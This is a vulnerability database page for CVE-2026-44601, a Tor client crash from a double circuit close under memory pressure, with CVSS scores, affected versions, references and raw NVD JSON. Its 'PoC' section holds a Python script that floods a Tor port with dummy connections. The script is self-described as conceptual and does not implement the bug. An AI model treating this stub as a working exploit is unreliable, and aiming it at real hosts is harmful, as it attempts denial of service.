Security Vulnerability Report
中文
CVE-2026-44601 CVSS 3.7 LOW

CVE-2026-44601

Published: 2026-05-07 04:16:35
Last Modified: 2026-05-08 17:07:19

Description

Tor before 0.4.9.7, when circuit queue memory pressure exists, can experience a client crash because of a double close of a circuit, aka TROVE-2026-009.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:torproject:tor:*:*:*:*:*:*:*:* - VULNERABLE
Tor < 0.4.9.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for CVE-2026-44601 (Tor Double Close Crash) # This script attempts to simulate memory pressure conditions. # Note: Successful exploitation requires specific timing and internal state. import socket import time def simulate_circuit_pressure(target_host, target_port): """ Simulates creating connections to induce memory pressure. In a real scenario, specific cell manipulation triggers the double close. """ print(f"[*] Attempting to target {target_host}:{target_port}") # Simulate rapid connection attempts to fill circuit queue for i in range(100): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(0.5) s.connect((target_host, target_port)) # Sending dummy data that might resemble circuit creation hints # Actual payload requires deep knowledge of Tor protocol cells payload = b"\x00\x01\x02\x03" s.send(payload) s.close() except Exception as e: pass print("[+] Simulation finished. Check if Tor process has crashed.") if __name__ == "__main__": # Replace with actual Tor IP and Port (e.g., 127.0.0.1:9050) simulate_circuit_pressure("127.0.0.1", 9050)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44601", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:35.030", "lastModified": "2026-05-08T17:07:19.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tor before 0.4.9.7, when circuit queue memory pressure exists, can experience a client crash because of a double close of a circuit, aka TROVE-2026-009."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-837"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torproject:tor:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.4.9.7", "matchCriteriaId": "E643A817-85FE-4CEC-BC69-0E2FA22639C0"}]}]}], "references": [{"url": "https://forum.torproject.org/c/news/tor-release-announcement/28", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://gitlab.torproject.org/tpo/core/tor/-/commit/d4e3f6a440b58c2be661decf20c09548704907dc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://gitlab.torproject.org/tpo/core/tor/-/work_items/41237", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/06/8", "source": "[email protected]", "tags": ["Mailing List", "Release Notes"]}]}}